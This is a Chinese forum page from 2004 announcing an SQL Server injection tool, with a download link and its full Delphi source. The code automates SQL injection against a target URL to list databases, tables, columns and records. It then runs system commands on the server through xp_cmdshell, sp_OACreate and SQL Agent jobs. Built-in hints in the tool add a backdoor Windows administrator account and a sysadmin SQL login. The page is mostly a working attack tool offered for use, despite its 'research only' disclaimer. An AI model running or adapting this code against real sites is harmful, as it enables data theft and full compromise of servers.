SQL Server注入工具 1.0

SQL Server注入工具 1.0

利用SQL Server的注入漏洞实现猜解数据库名，表名，字段名及记录的信息，由于网速的原因，目前限制了只能同时猜解前5个字段值的记录信息。另外实现了三种方式执行系统命令，同时可回显显示。

本程序只供测试研究使用，由此软件造成的后果一概不负责任，由于编写比较仓促，代码难免有纰漏之处，欢迎大家批评指正。

下载地址：http://free.efile.com.cn/hnxyy/NBSI.exe

作者:Hnxyy QQ:19026695

2004.12.16 北京

FireFox技术交流论坛

http://www.wrsky.com

临时访问地址

http://firefoxer.nease.net

It is all beginnings free

It is all ruin to be privately owned

D7原代码：

unit untmain;

interface

uses

Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

Dialogs, StdCtrls, idHttp, IdBaseComponent, IdComponent, IdTCPConnection,

IdTCPClient, OleCtrls, SHDocVw,mshtml;

type

TForm1 = class(TForm)

Label1: TLabel;

EdtUrl: TEdit;

BtnCheck: TButton;

Label2: TLabel;

GroupBox1: TGroupBox;

Label7: TLabel;

Label3: TLabel;

Label4: TLabel;

Label5: TLabel;

Label6: TLabel;

EdtMuliCase: TEdit;

EdtQuery: TEdit;

EdtUser: TEdit;

EdtPower: TEdit;

EdtDbName: TEdit;

Memo1: TMemo;

GroupBox2: TGroupBox;

cbDisp: TCheckBox;

EdtCommand: TEdit;

rbCmd: TRadioButton;

rbOA: TRadioButton;

BtnExecute: TButton;

GroupBox3: TGroupBox;

Memo2: TMemo;

wb: TWebBrowser;

BtnStop: TButton;

rbJob: TRadioButton;

BtnCancel: TButton;

procedure BtnCheckClick(Sender: TObject);

procedure BtnExecuteClick(Sender: TObject);

procedure wbDocumentComplete(Sender: TObject; const pDisp: IDispatch;

var URL: OleVariant);

procedure BtnStopClick(Sender: TObject);

procedure rbCmdClick(Sender: TObject);

procedure rbOAClick(Sender: TObject);

procedure rbJobClick(Sender: TObject);

procedure FormShow(Sender: TObject);

procedure BtnCancelClick(Sender: TObject);

private

{ Private declarations }

tag:integer;

isFinish,isCancel:boolean;

function Get(URL: string): boolean;

function GetWBMsg(URL: string): string;

Function StrToNChar(DbName,TName:string): string;

procedure SetRdbCheck(rd:TRadioButton);

public

{ Public declarations }

end;

var

Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.BtnCheckClick(Sender: TObject);

const

vFieldCount=5;

PowerStr :array[0..6] of string=(

'sysadmin','dbcreator','diskadmin',

'processadmin','serveradmin',

'setupadmin','securityadmin');

var

Url,DbName,TName,TName0,ColName,ColName0,NCharStr:string;

i,j,k,iCount:integer;

VerStr,ValueStr,CountStr,Powers:string;

FieldStr,FieldOrdStr,CFieldStr:string;

vfield:OleVariant;

begin

try

EdtMuliCase.Text :='';

EdtQuery.Text :='';

EdtUser.Text :='';

EdtPower.Text :='';

EdtDbName.Text :='';

Url:=trim(EdtUrl.Text);

isFinish :=False;

vfield :=VarArrayCreate([0,vFieldCount-1],varVariant);

Memo1.Clear;

Screen.Cursor :=crHourGlass;

//判断是否支持多句查询

if Get(Url+';declare%20@a%20int--') then

begin

EdtMuliCase.Text :='支持';

end else

begin

EdtMuliCase.Text :='不支持';

end;

//判断是否支持子查询

if get(Url+'%20and%20(Select%20count(1)%20from%20[sysobjects])>=0') then

begin

EdtQuery.Text :='支持';

end else

begin

EdtQuery.Text :='不支持';

end;

//取得当前用户

EdtUser.Text :=GetWBMsg(Url+'%20and%20char(124)%2Buser%2Bchar(124)=0');

//取得当前用户登录的服务器角色成员

for i:=0 to High(PowerStr) do

begin

if get(Url+'%20And%20Cast(IS_SRVROLEMEMBER('''+PowerStr[i]+''')%20as%20varchar(1))=1') then

begin

Powers :=Powers+PowerStr[i]+'|';

end;

end;

if Powers='' then

EdtPower.Text :='未知'

else EdtPower.Text :=Powers;

//指明当前用户是否为 db_owner 固定数据库角色的成员

{ if get(Url+'%20And%20Cast(IS_MEMBER(''db_owner'')%20as%20varchar(1))=1') then

begin

EdtPower.Text :='db_owner';

end else

begin

EdtPower.Text :='未知';

end; }

//得到当前SQL Server的版本号

VerStr :=GetWBMsg(Url+'%20and%20char(124)%2B@@version%2Bchar(124)>0');

Memo1.Lines.Add('当前版本号：'+VerStr);

Memo1.Lines.Add('');

//取得数据库名

DbName :=GetWBMsg(Url+'%20And%20char(124)%2Bdb_name()%2Bchar(124)=0');

EdtDbName.Text :=DbName;

if (DbName='') or (DbName='未知') then

begin

Memo1.Lines.Add('未知的数据库，操作终止！');

exit;

end;

Memo1.Lines.Add('当前数据库：'+DbName);

BtnStop.Visible :=true;

BtnCheck.Visible :=False;

//猜解表名

Memo1.Lines.Add('');

Memo1.Lines.Add('开始猜解表名.....');

Memo1.Lines.Add('#######################');

for i:=1 to 1000 do

begin

TName :='';

TName :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20cast(char(124)%2Bname%2Bchar(124)%20as%20varchar(8000))'+

'%20from(Select%20Top%20'+inttostr(i)+'%20id,name%20from%20['+DbName+']..[sysobjects]'+

'%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0;--');

if (TName0=TName) or (isFinish) then

Break;

Memo1.Lines.Add('表名 :'+TName);

//猜解列名

Memo1.Lines.Add('');

Memo1.Lines.Add('开始猜解列名.....');

Memo1.Lines.Add('#######################');

NCharStr :='';

NCharStr :=StrToNChar(DbName,TName);

j:=1;

while j<1000 do

begin

ColName :='';

ColName :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20cast(char(124)%2Bname%2Bchar(124)'+

'%20as%20varchar(8000))%20from%20(Select%20Top%20'+inttostr(j)+'%20colid,name'+

'%20From%20['+DbName+']..[syscolumns]%20Where%20id%20=%20'+NCharStr+

'%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0;--');

if (ColName0=ColName) or (isFinish) then

j:=1000

else begin

Memo1.Lines.Add('列名 '+inttostr(j)+' :'+ColName);

if j<vFieldCount+1 then

begin

vfield[j-1] :=ColName;

end;

ColName0 :=ColName;

inc(j);

end;

end;

Memo1.Lines.Add('#######################');

Memo1.Lines.Add('列名猜解结束.....');

Memo1.Lines.Add('');

//猜解数据

Memo1.Lines.Add('开始猜解数据.....');

Memo1.Lines.Add('#######################');

CountStr :=GetWBMsg(Url+'%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))'+

'%2Bchar(124)%20From%20['+TName+']%20Where%201=1)>0;--');

try

iCount :=strtoint(CountStr);

except

Memo1.Lines.add('出现意外数据，操作终止！');

exit;

end;

Memo1.Lines.Add('表 '+TName+' ：共有 '+CountStr+' 条数据。');

CFieldStr :='';

FieldStr :='';

FieldOrdStr :='';

for k:=0 to vFieldCount-1 do

begin

if k=0 then

begin

CFieldStr :='isNull(cast(['+vfield[0]+']%20as%20varchar(8000)),char(32))';

FieldStr :='['+vfield[0]+']';

FieldOrdStr :='['+vfield[0]+']%20desc';

end else

begin

CFieldStr :=CFieldStr+'%2B%20%2BisNull(cast(['+vfield[k]+']%20as%20varchar(8000)),char(32))';

FieldStr :=FieldStr+',['+vfield[k]+']';

FieldOrdStr :=FieldOrdStr+',['+vfield[k]+']%20desc';

end;

end;

k:=1;

while k<iCount+1 do

begin

ValueStr :='';

ValueStr :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20char(124)%2B'+CFieldStr+'%2Bchar(124)%20From%20(Select'+

'%20Top%20'+inttostr(k)+'%20'+FieldStr+'%20From%20['+DbName+']..['+TName+']%20Where%201=1'+

'%20Order%20by%20'+FieldStr+')%20T%20Order%20by%20'+FieldOrdStr+')>0;--');

if isFinish then

k:=iCount+1;

Memo1.Lines.Add('数据 '+inttostr(k)+' :'+ValueStr);

inc(k);

end;

Memo1.Lines.Add('#######################');

Memo1.Lines.Add('数据猜解结束.....');

Memo1.Lines.Add('');

TName0 :=TName;

end;

Memo1.Lines.Add('#######################');

Memo1.Lines.Add('表名猜解结束.....');

finally

Screen.Cursor :=crDefault;

BtnStop.Visible :=False;

BtnCheck.Visible :=True;

end;

end;

procedure TForm1.BtnExecuteClick(Sender: TObject);

var

Url,DbName,CommandStr:string;

ResultStr,CountStr:string;

iCount,i:integer;

begin

try

Url:=trim(EdtUrl.Text);

ResultStr :='';

CommandStr :='';

isCancel :=False;

CommandStr:=trim(EdtCommand.Text);

CommandStr:=StringReplace(CommandStr,'%','%25',[rfReplaceAll]);

CommandStr:=StringReplace(CommandStr,' ','%20',[rfReplaceAll]);

Memo2.Clear;

Screen.Cursor :=crHourGlass;

//取得数据库名

DbName :=GetWBMsg(Url+'%20And%20char(124)%2Bdb_name()%2Bchar(124)=0');

if (DbName='') or (DbName='未知') then

begin

Memo2.Lines.Add('未知的数据库，操作终止！');

exit;

end;

//Cmd_shell

//使用xp_cmdshell来运行系统命令

if rbCmd.Checked then

begin

//回显

if cbDisp.Checked then

begin

BtnCancel.Visible :=true;

BtnExecute.Visible :=False;

//第一种办法

//把命令执行的结果保存到一个本地文件中，然后将此文件的内容写入到新建的临时表进行输出

{CommandStr:=Url+';EXEC%20MASTER..XP_CMDSHELL%20'''+CommandStr+'>C:\Command_Tmp.log'''+

';DROP%20TABLE%20[Command_Tmp]'+

';CREATE%20TABLE%20[Command_Tmp]([ResultTxt]%20varchar(7996)%20NULL)'+

';BULK%20INSERT%20['+DbName+']..[Command_Tmp]%20FROM%20''C:\Command_Tmp.log''%20WITH%20(KEEPNULLS)'+

';Alter%20Table%20[Command_Tmp]%20add%20[ID]%20int%20NOT%20NULL%20IDENTITY%20(1,1)--'; }

//第二种办法，直接把命令执行的结果写入数据库中输出，效率较高

CommandStr :=Url+';DROP%20TABLE%20[Command_Tmp];'+

'CREATE%20TABLE%20[Command_Tmp]([id]%20int%20NOT%20NULL%20IDENTITY%20(1,1),'+

'%20[ResultTxt]%20varchar(1024)%20NULL);'+

'insert%20into%20[Command_Tmp](ResultTxt)%20EXEC%20MASTER..XP_CMDSHELL%20'''+

CommandStr+''';insert%20into%20[Command_Tmp]%20values%20(''g_over'')--';

if Get(CommandStr) then

begin

CountStr :=GetWBMsg(Url+'%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))'+

'%2Bchar(124)%20From%20[Command_Tmp]%20Where%201=1)>0;--');

try

iCount :=strtoint(CountStr);

except

Memo2.Lines.add('出现意外数据，操作终止！');

exit;

end;

for i:=1 to iCount do

begin

ResultStr :='';

ResultStr :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20CASE%20WHEN%20ResultTxt%20is%20Null'+

'%20then%20char(32)%20else%20char(124)%2BResultTxt%2Bchar(124)'+

'%20End%20From%20[Command_Tmp]%20Where%20ID='+IntToStr(i)+')=0;--');

if isCancel then

Break;

if (ResultStr<>'') and (ResultStr<>'未知') then

Memo2.Lines.Add(ResultStr);

end;

end;

if Get(Url+';DROP%20TABLE%20[Command_Tmp]--') then

begin

Memo2.Lines.Add('命令执行完成');

end;

end else

begin

CommandStr:=Url+';EXEC%20MASTER..XP_CMDSHELL%20'''+CommandStr+'''--';

if get(CommandStr) then

Memo2.Lines.Add('命令执行完成。');

end;

end;

//OAcreate

//使用sp_OACreate来运行系统命令

if rbOA.Checked then

begin

//指明当前用户是否为 sysadmin 固定服务器角色的成员

if get(Url+'%20And%20Cast(IS_SRVROLEMEMBER(''sysadmin'')%20as%20varchar(1))=1') then

begin

CommandStr :=Url+';use%20'+DbName+';declare%20@o%20int;exec%20'+

'sp_oacreate%20''wscript.shell'',@o%20out;exec%20'+

'sp_oamethod%20@o,''run'',NULL,''cmd%20/c%20'+

CommandStr+'''--';

if Get(CommandStr) then

Memo2.Lines.Add('命令执行完成。');

end else

begin

Memo2.Lines.Add('只有 sysadmin 固定服务器角色的成员才能执行 sp_OACreate。');

exit;

end;

end;

//Job

//使用SQLSERVERAGENT的JOB来运行系统命令

if rbJob.Checked then

begin

//启动SQLSERVERAGENT

if Get(Url+';exec%20master..xp_servicecontrol%20''start'',''SQLSERVERAGENT'';--') then

begin

Memo2.Lines.Add('SQLSERVERAGENT 启动成功！');

CommandStr :=Url+';use%20'+DbName+';exec%20sp_delete_job%20null,''x'''+

';exec%20sp_add_job%20''x'''+

';exec%20sp_add_jobstep%20Null,''x'',Null,''1'',''CMDEXEC'',''cmd%20/c%20'+

CommandStr+''';exec%20sp_add_jobserver%20Null,''x'',@@servername'+

';exec%20sp_start_job%20''x''--';

if get(CommandStr) then

Memo2.Lines.Add('命令执行完成。');

end else

begin

Memo2.Lines.Add('SQLSERVERAGENT 启动失败，操作终止！');

exit;

end;

end;

finally

Screen.Cursor :=crDefault;

BtnExecute.Visible :=true;

BtnCancel.Visible :=false;

end;

end;

function TForm1.Get(URL: string): boolean;

var

IDHTTP: TIDHttp;

ss: String;

begin

Result:= False;

IDHTTP:= TIDHTTP.Create(nil);

try

try

idhttp.HandleRedirects:= true; //必须支持重定向否则可能出错

idhttp.ReadTimeout:= 30000; //超过这个时间则不再访问

ss:= IDHTTP.Get(URL);

if IDHTTP.ResponseCode=200 then

Result :=true;

except

//on E: Exception do

// Application.MessageBox(pchar('出现异常，操作终止！'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);

end;

finally

IDHTTP.Free;

end;

end;

function TForm1.GetWBMsg(URL: string): string;

function GetResultStr(str:string):string;

var

istart,iend:integer;

ss:string;

begin

istart:=pos('|',str);

if istart>0 then

begin

ss:=copy(str,istart+1,length(str)-istart);

iend :=pos('|',ss);

if iend>0 then

begin

ss:=copy(ss,1,iend-1);

end;

end;

if ss='' then

Result :='未知'

else Result :=ss;

end;

var

ss:string;

begin

tag:=0;

wb.Navigate(URL);

while (tag=0) do

Application.ProcessMessages;

ss :=(wb.Document as IHTMLDocument2).Body.innerText;

Result :=GetResultStr(ss);

end;

function TForm1.StrToNChar(DbName, TName: string): string;

var

i:integer;

ss,str:string;

begin

ss:=DbName+'..'+TName;

for i:=1 to length(ss) do

begin

if i=1 then

str :='NCHAR('+inttostr(ord(ss[i]))+')'

else

str :=str+'%2BNCHAR('+inttostr(ord(ss[i]))+')';

end;

Result :='OBJECT_ID('+str+')';

end;

procedure TForm1.wbDocumentComplete(Sender: TObject;

const pDisp: IDispatch; var URL: OleVariant);

begin

//Memo2.Text :=(wb.Document as IHTMLDocument2).Body.innerText;

tag:=1;

end;

procedure TForm1.BtnStopClick(Sender: TObject);

begin

isFinish :=True;

BtnCheck.Visible :=true;

BtnStop.Visible :=False;

end;

procedure TForm1.SetRdbCheck(rd: TRadioButton);

begin

Memo2.Clear;

if rd=rbCmd then

begin

cbDisp.Enabled :=True;

Memo2.Lines.Add('使用xp_cmdshell来运行系统命令');

Memo2.Lines.Add('');

Memo2.Lines.Add('net user test test /add');

Memo2.Lines.Add('net localgroup administrators test /add');

Memo2.Lines.Add('exec master..sp_addlogin test,test');

Memo2.Lines.Add('exec master..sp_addsrvrolemember test,sysadmin');

end;

if rd=rbOA then

begin

cbDisp.Enabled :=False;

Memo2.Lines.Add('使用sp_OACreate来运行系统命令');

end;

if rd=rbJob then

begin

cbDisp.Enabled :=False;

Memo2.Lines.Add('使用SQLSERVERAGENT的JOB来运行系统命令');

Memo2.Lines.Add('请先使用下列语句启动SQLSERVERAGENT:');

Memo2.Lines.Add('');

Memo2.Lines.Add('http://x.com/x.asp?a=1;exec master..xp_servicecontrol ''start'',''SQLSERVERAGENT'';--');

end;

end;

procedure TForm1.rbCmdClick(Sender: TObject);

begin

SetRdbCheck(rbcmd);

end;

procedure TForm1.rbOAClick(Sender: TObject);

begin

SetRdbCheck(rbOA);

end;

procedure TForm1.rbJobClick(Sender: TObject);

begin

SetRdbCheck(rbJob);

end;

procedure TForm1.FormShow(Sender: TObject);

begin

SetRdbCheck(rbcmd);

end;

procedure TForm1.BtnCancelClick(Sender: TObject);

begin

isCancel :=True;

BtnExecute.Visible :=true;

BtnCancel.Visible :=false;

end;

end.

• ·验证输入的JavaScript代码
• ·delphi小技巧集锦
• ·uClinux系统简介
• ·深入探索C++对象模型 之 Data语意学
• ·【收藏】你最需要注意的11条要点for C++
• ·按指定编码方式读取文件和输出文件
• ·可以互相操作的下拉菜单（动态生成的下拉菜单）
• ·使用弹出窗口的技巧小结
• ·WEB用户控件(DatePicker)
• ·水滴石穿C语言之声明的语法